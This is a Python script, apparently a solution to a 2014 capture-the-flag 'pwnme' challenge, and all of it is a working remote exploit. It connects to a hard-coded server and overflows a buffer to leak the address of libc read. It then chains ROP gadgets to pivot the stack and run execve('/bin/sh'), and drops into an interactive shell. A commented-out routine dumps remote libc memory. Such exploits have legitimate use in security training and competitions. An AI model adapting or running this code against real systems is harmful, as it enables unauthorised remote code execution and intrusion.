isg2014 - pwnme.py

import socket
import sys
import time
import struct
import re

def R():
  global sk
  return sk.recv(4096000)

def S(x):
  global sk
  return sk.send(x)

def PQ(x):
  return struct.pack('Q', x)

'''
def dump(offset,size=65536):
  global sk
  sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  sk.connect(('202.120.7.75',34343))

  R()

  plt_write = 0x400480
  text_main = 0x4005BD

  S('A'*16 + PQ(0x601040) + PQ(0x4005E3))
  S(PQ(0x601048) + PQ(0x4005D9) + PQ(0x601030) + PQ(0x4005E3))
  time.sleep(0.5)
  S('A')
  x = R()
  libc_read = struct.unpack('Q',(x[8:16]))[0]
  S(PQ(0x40065A)+PQ(0)+PQ(0)+PQ(0x601070)+PQ(size)+PQ(libc_read+offset)+PQ(0)+PQ(0x400640)+PQ(0x4005D9))
  s = ''
  while len(s)<size:
    s += R()
  sk.close()
  return s

print dump(52203,2).encode('hex')
print dump(117061,2).encode('hex')
print dump(315,2).encode('hex')
print dump(6786,2).encode('hex')
print dump(61685,3).encode('hex')
'''

sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sk.connect(('202.120.7.75',34343))
print R()

S('A'*16 + PQ(0x601040) + PQ(0x4005E3))
S(PQ(0x601048) + PQ(0x4005D9) + PQ(0x601030) + PQ(0x4005E3))
time.sleep(0.5)
S('A')
libc_read = struct.unpack('Q',(R()[8:16]))[0]
print 'read@libc', hex(libc_read)

pop_rbp_ret = 0x400515
leave_ret = 0x4005FE
pop_rax_ret = libc_read + 52203
pop_rdx_ret = libc_read + 117061
pop_rdi_ret = libc_read + 315
pop_rsi_ret = libc_read + 6786
syscall = libc_read + 61685

new_esp = 0x601800
S(PQ(pop_rdi_ret)+PQ(0)+
    PQ(pop_rsi_ret)+PQ(new_esp)+
    PQ(pop_rdx_ret)+PQ(0x400)+
    PQ(pop_rax_ret)+PQ(0)+
    PQ(syscall)+
    PQ(pop_rbp_ret)+PQ(new_esp)+PQ(leave_ret))
data = new_esp+0x200
S((PQ(0)+
  PQ(pop_rdi_ret)+PQ(data)+
  PQ(pop_rsi_ret)+PQ(data+0x10)+
  PQ(pop_rdx_ret)+PQ(data+0x18)+
  PQ(pop_rax_ret)+PQ(59)+
  PQ(syscall)
  ).ljust(0x200,'\x00')+

  "/bin/sh".ljust(0x10,'\x00')+ #0x0
  PQ(data) + #0x10
  PQ(0) #0x18
  )

while True:
  cmd = raw_input('$ ')
  S(cmd+'\n')
  time.sleep(1)
  print R()